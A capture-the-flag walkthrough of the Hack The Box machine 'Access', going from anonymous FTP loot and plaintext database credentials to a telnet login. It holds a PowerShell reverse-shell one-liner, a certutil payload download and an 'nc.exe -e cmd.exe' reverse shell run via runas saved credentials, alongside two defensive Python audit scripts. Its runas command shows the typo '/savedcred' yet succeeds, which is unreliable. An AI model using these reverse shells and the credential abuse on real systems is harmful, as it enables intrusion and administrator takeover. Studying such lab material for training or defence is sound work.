HTB Access

$ nmap -A -T4 -p- 10.10.10.98

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-11 10:15 CEST
Nmap scan report for 10.10.10.98
Host is up (0.046s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.76 seconds

Open ports detected:
• 21/tcp open ftp Microsoft ftpd
• 23/tcp open telnet?
• 80/tcp open http Microsoft IIS httpd 7.5

$ ftp 10.10.10.98

Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:ruben): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

ftp> cd Backups
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

ftp> get backup.mdb

local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 28296 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
5652480 bytes received in 1.82 secs (2.9657 MB/s)

ftp> cd ..
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

ftp> cd Engineer
ftp> dir

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.

ftp> get "Access Control.zip"

local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 45 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
10870 bytes received in 0.20 secs (53.5825 kB/s)

The files have not been downloaded correctly: the warning about bare linefeeds shows the transfer ran in ASCII mode, which is the ftp client's default and is only suitable for text files.
We need to download both files again, this time with binary mode enabled.

ftp> cd backups

250 CWD command successful.

ftp> ls

200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.

ftp> binary

200 Type set to I.

ftp> get backup.mdb

local: backup.mdb remote: backup.mdb
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
5652480 bytes received in 4.24 secs (1.2725 MB/s)

ftp> cd Engineer
ftp> get "Access Control.zip"

local: Access Control.zip remote: Access Control.zip
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
10870 bytes received in 0.28 secs (38.4597 kB/s)

$ file backup.mdb

backup.mdb: Microsoft Access Database

The file is a Microsoft Access database.
To read the .mdb file from our Kali Linux box we need mdbtools.

Let’s install it:

https://github.com/mdbtools/mdbtools

$ sudo apt install mdbtools

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes adicionales:
  libmdb2 libmdbsql2
Paquetes sugeridos:
  mdbtools-doc
Se instalarán los siguientes paquetes NUEVOS:
  libmdb2 libmdbsql2 mdbtools
0 actualizados, 3 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Se necesita descargar 159 kB de archivos.
Se utilizarán 478 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 http://kali.download/kali kali-rolling/main amd64 libmdb2 amd64 0.7.1-6+b1 [61,9 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 libmdbsql2 amd64 0.7.1-6+b1 [40,5 kB]
Des:3 http://kali.download/kali kali-rolling/main amd64 mdbtools amd64 0.7.1-6+b1 [56,6 kB]
Descargados 159 kB en 1s (126 kB/s)
Seleccionando el paquete libmdb2:amd64 previamente no seleccionado.
(Leyendo la base de datos ... 321224 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../libmdb2_0.7.1-6+b1_amd64.deb ...
Desempaquetando libmdb2:amd64 (0.7.1-6+b1) ...
Seleccionando el paquete libmdbsql2:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libmdbsql2_0.7.1-6+b1_amd64.deb ...
Desempaquetando libmdbsql2:amd64 (0.7.1-6+b1) ...
Seleccionando el paquete mdbtools previamente no seleccionado.
Preparando para desempaquetar .../mdbtools_0.7.1-6+b1_amd64.deb ...
Desempaquetando mdbtools (0.7.1-6+b1) ...
Configurando libmdb2:amd64 (0.7.1-6+b1) ...
Configurando libmdbsql2:amd64 (0.7.1-6+b1) ...
Configurando mdbtools (0.7.1-6+b1) ...
Procesando disparadores para libc-bin (2.31-2) ...
Procesando disparadores para man-db (2.9.3-2) ...
Procesando disparadores para kali-menu (2020.3.2) ...

The command mdb-tables mdb_file.mdb lists all the tables in the database.
Its output can be piped to grep to highlight the tables matching our search.

In this Access database, the following tables include “user” in their name:
• auth_user
• auth_user_groups
• auth_user_user_groups_permissions
• userinfo_attarea

Let’s export the “auth_user” table to see its content.

$ sudo mdb-export backup.mdb auth_user

id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

We’ve found 3 credentials:
• admin:admin
• engineer:access4u@security
• backup_admin:admin
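As an added example (not part of the original writeup), a small Python audit of the mdb-export CSV shown above: it flags plaintext storage, passwords equal to the username, default passwords and passwords shared between accounts. The sample CSV is the table above and the default-password list is a constructed illustration.

```python
import csv
import io
import re

# Constructed sample: the auth_user export shown above (mdb-export CSV output).
AUTH_USER_CSV = """id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
"""

# Short illustrative list of default passwords (constructed, not exhaustive).
DEFAULT_PASSWORDS = {"admin", "password", "123456", "welcome"}

# Heuristic: long hex digests or common hash prefixes mean the value is probably hashed,
# anything else is treated as a plaintext password.
HASH_LIKE = re.compile(r"^(?:[0-9a-f]{32,}$|\$2[aby]\$|\$[56]\$|pbkdf2)", re.IGNORECASE)


def audit_auth_user(csv_text):
    """Return a list of (username, finding) tuples describing weak credential handling."""
    findings = []
    users_by_password = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        user, pw = row["username"], row["password"]
        if not HASH_LIKE.match(pw):
            findings.append((user, "password stored in plaintext"))
        if pw.lower() == user.lower():
            findings.append((user, "password equals username"))
        if pw.lower() in DEFAULT_PASSWORDS:
            findings.append((user, "default/common password"))
        users_by_password.setdefault(pw, []).append(user)
    # The same secret reused by several accounts: one leak compromises all of them.
    for users in users_by_password.values():
        if len(users) > 1:
            findings.append((",".join(users), "password shared between accounts"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_auth_user(AUTH_USER_CSV):
        print(f"{user}: {finding}")
```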

If you try to open the file “Access Control.zip”, it will ask for a password.
Use “access4u@security” to extract it.
You’ll get a file called “Access Control.pst”.

We need an application that can read .pst files.

$ sudo apt search readpst

[sudo] password for ruben: 
Ordenando... Hecho
Buscar en todo el texto... Hecho
pst-utils/kali-rolling 0.6.75-1 amd64
  tools for reading Microsoft Outlook PST files

$ sudo apt install pst-utils

Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes adicionales:
  libgsf-1-114 libgsf-1-common libpst4
Paquetes sugeridos:
  mb2md
Se instalarán los siguientes paquetes NUEVOS:
  libgsf-1-114 libgsf-1-common libpst4 pst-utils
0 actualizados, 4 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Se necesita descargar 472 kB de archivos.
Se utilizarán 1.569 kB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n] 
Des:1 http://kali.download/kali kali-rolling/main amd64 libgsf-1-common all 1.14.47-1 [158 kB]
Des:2 http://kali.download/kali kali-rolling/main amd64 libgsf-1-114 amd64 1.14.47-1 [161 kB]
Des:3 http://kali.download/kali kali-rolling/main amd64 libpst4 amd64 0.6.75-1 [77,1 kB]
Des:4 http://kali.download/kali kali-rolling/main amd64 pst-utils amd64 0.6.75-1 [75,4 kB]
Descargados 472 kB en 1s (494 kB/s)  
Seleccionando el paquete libgsf-1-common previamente no seleccionado.
(Leyendo la base de datos ... 321264 ficheros o directorios instalados actualmente.)
Preparando para desempaquetar .../libgsf-1-common_1.14.47-1_all.deb ...
Desempaquetando libgsf-1-common (1.14.47-1) ...
Seleccionando el paquete libgsf-1-114:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libgsf-1-114_1.14.47-1_amd64.deb ...
Desempaquetando libgsf-1-114:amd64 (1.14.47-1) ...
Seleccionando el paquete libpst4:amd64 previamente no seleccionado.
Preparando para desempaquetar .../libpst4_0.6.75-1_amd64.deb ...
Desempaquetando libpst4:amd64 (0.6.75-1) ...
Seleccionando el paquete pst-utils previamente no seleccionado.
Preparando para desempaquetar .../pst-utils_0.6.75-1_amd64.deb ...
Desempaquetando pst-utils (0.6.75-1) ...
Configurando libgsf-1-common (1.14.47-1) ...
Configurando libgsf-1-114:amd64 (1.14.47-1) ...
Configurando libpst4:amd64 (0.6.75-1) ...
Configurando pst-utils (0.6.75-1) ...
Procesando disparadores para libc-bin (2.31-2) ...
Procesando disparadores para man-db (2.9.3-2) ...
Procesando disparadores para kali-menu (2020.3.2) ...

$ sudo readpst Access\ Control.pst

Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

$ ls

'Access Control.mbox'  'Access Control.pst'  'Access Control.zip'   access.ctb   backup.mdb   results

$ cat "Access Control.mbox"

From "john@megacorp.com" Fri Aug 24 01:44:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="--boundary-LibPST-iamunique-1692514513_-_-"

----boundary-LibPST-iamunique-1692514513_-_-
Content-Type: multipart/alternative;
	boundary="alt---boundary-LibPST-iamunique-1692514513_-_-"

--alt---boundary-LibPST-iamunique-1692514513_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

...

So, the “security” account password is “4Cc3ssC0ntr0ller”:
security:4Cc3ssC0ntr0ller

$ telnet 10.10.10.98

Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security 
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================

C:\Users\security>dir

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

08/23/2018  11:52 PM    <DIR>          .
08/23/2018  11:52 PM    <DIR>          ..
08/24/2018  08:37 PM    <DIR>          .yawcam
08/21/2018  11:35 PM    <DIR>          Contacts
08/28/2018  07:51 AM    <DIR>          Desktop
08/21/2018  11:35 PM    <DIR>          Documents
08/21/2018  11:35 PM    <DIR>          Downloads
08/21/2018  11:35 PM    <DIR>          Favorites
08/21/2018  11:35 PM    <DIR>          Links
08/21/2018  11:35 PM    <DIR>          Music
08/21/2018  11:35 PM    <DIR>          Pictures
08/21/2018  11:35 PM    <DIR>          Saved Games
08/21/2018  11:35 PM    <DIR>          Searches
08/24/2018  08:39 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  16,771,776,512 bytes free

C:\Users\security>cd Desktop
C:\Users\security\Desktop>dir

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  07:51 AM    <DIR>          .
08/28/2018  07:51 AM    <DIR>          ..
08/21/2018  11:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,771,776,512 bytes free

C:\Users\security\Desktop>type user.txt

ff1fXXXXXXXXXXXXXXXXXXXXXXXXXXXX

As we are currently in a Telnet shell, let’s upgrade it: the PowerShell one-liner below opens a reverse shell back to our listener on 10.10.14.13:4444.

powershell -command "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.13',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

«cmdkey /list» is a useful command that displays the user names and credentials stored on a Windows system.

$ nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.98] 49157
whoami
access\security
PS C:\Users\security>

PS C:\Users\security> cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator
    
PS C:\Users\security> 

According to this information we have a stored credential for “ACCESS\Administrator” on this system.

One of the possible reasons to store a credential is to run an application with administrative permissions (using the /savecred option) without having to log in as an administrator.
«runas /savecred» is usually placed in a shortcut that launches that application.

Let’s list all the shortcut files on the system and check whether any of them contain the string “runas”.

Get-ChildItem -Path "C:\" *.lnk -Recurse -Force -ErrorAction SilentlyContinue | Select-Object -ExpandProperty FullName | Out-File file.txt
ForEach ($file in gc .\file.txt) { Write-Output $file; gc $file | Select-String runas }

PS C:\Users\security> Get-ChildItem -Path "C:\" *.lnk -Recurse -Force | ft fullname | Out-File file.txt
PS C:\Users\security> dir

    Directory: C:\Users\security

Mode                LastWriteTime     Length Name                                          
----                -------------     ------ ----                                          
d----         8/24/2018   8:37 PM            .yawcam                                       
d-r--         8/21/2018  11:35 PM            Contacts                                      
d-r--         8/28/2018   7:51 AM            Desktop                                       
d-r--         8/21/2018  11:35 PM            Documents                                     
d-r--         8/21/2018  11:35 PM            Downloads                                     
d-r--         8/21/2018  11:35 PM            Favorites                                     
d-r--         8/21/2018  11:35 PM            Links                                         
d-r--         8/21/2018  11:35 PM            Music                                         
d-r--         8/21/2018  11:35 PM            Pictures                                      
d-r--         8/21/2018  11:35 PM            Saved Games                                   
d-r--         8/21/2018  11:35 PM            Searches                                      
d-r--         8/24/2018   8:39 PM            Videos                                        
-a---         9/29/2020   4:07 PM      25496 file.txt        

PS C:\Users\security> ForEach ($file in gc .\file.txt) {Write-Output $file; gc $file; gc $file | Select-String runas}

FullName
--------
[the raw binary content of each .lnk, printed by gc $file, is omitted here]
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Remote Desktop Connection.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
...

Going through these results, this entry stands out:

C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk   

There is a ZKAccess shortcut on the Public Desktop configured to use «runas /savecred».

PS C:\Users\Public\Desktop> ls

    Directory: C:\Users\Public\Desktop

Mode                LastWriteTime     Length Name                                            
----                -------------     ------ ----                                            
-a---         8/22/2018  10:18 PM       1870 ZKAccess3.5 Security System.lnk 

Windows offers no way to restrict a credential saved with «runas /savecred» to a single application, so once this .lnk file has been found, runas can be used to run any command with the stored administrator’s privileges.
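As an added example, not the author's code, a Python check that does what the Select-String search above approximates: it parses the StringData section of each .lnk file following the MS-SHLLINK layout and flags shortcuts whose arguments carry the /savecred switch, so an administrator can find such shortcuts before an attacker does. The build_lnk helper and the paths it uses are constructed test data, not the target's shortcut; decoding non-Unicode shortcuts as cp1252 is an assumption.

```python
import pathlib
import struct

# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader, offset 0x14).
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this order, each present only if its flag bit is set.
STRING_DATA = (
    (0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
    (0x20, "arguments"), (0x40, "icon_location"),
)
LINK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"


def parse_lnk(data):
    """Decode the StringData fields of a .lnk file into a dict. The IDList and
    LinkInfo blocks are skipped via their own size fields, not interpreted."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # character count, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:  # ANSI strings use the system code page; cp1252 is assumed here
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def uses_saved_credentials(fields):
    """True when the shortcut's arguments carry runas' /savecred switch."""
    return "/savecred" in fields.get("arguments", "").lower()


def scan_for_savecred(root):
    """Walk a directory tree and return (path, arguments) for every shortcut that
    relies on a saved credential; files that are not valid shortcuts are skipped."""
    hits = []
    for path in pathlib.Path(root).rglob("*.lnk"):
        try:
            fields = parse_lnk(path.read_bytes())
        except (ValueError, UnicodeDecodeError, struct.error, OSError):
            continue
        if uses_saved_credentials(fields):
            hits.append((str(path), fields["arguments"]))
    return hits


def build_lnk(relative_path, arguments):
    """Constructed test data: a minimal spec-shaped .lnk with only RelativePath
    and Arguments set (Unicode); not a real shortcut taken from the target."""
    flags = 0x08 | 0x20 | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LINK_CLSID, flags).ljust(0x4C, b"\x00")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body
```

Running scan_for_savecred(r"C:\Users") on a live system replaces the gc/Select-String loop above with a parse that cannot be fooled by the word "runas" appearing in unrelated bytes.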

To exploit this misconfiguration we create a new file, shell.bat, with the following content (it assumes nc.exe has already been placed in c:\users\security):

shell.bat:

c:\users\security\nc.exe -e cmd.exe 10.10.14.13 5555

Transfer this file to the target:

PS C:\Users\security> certutil.exe -urlcache -split -f http://10.10.14.13:8080/shell.bat shell.bat

****  Online  ****
  0000  ...
  0037
CertUtil: -URLCache command completed successfully.

$ nc -lnvp 5555
PS C:\Users\security> runas /user:ACCESS\Administrator /savedcred "c:\users\security\shell.bat"

listening on [any] 5555 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.98] 49172
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Windows\system32>

C:\Windows\system32>whoami

access\administrator

C:\Users\Administrator\Desktop>type root.txt

6e15XXXXXXXXXXXXXXXXXXXXXXXXXXXX
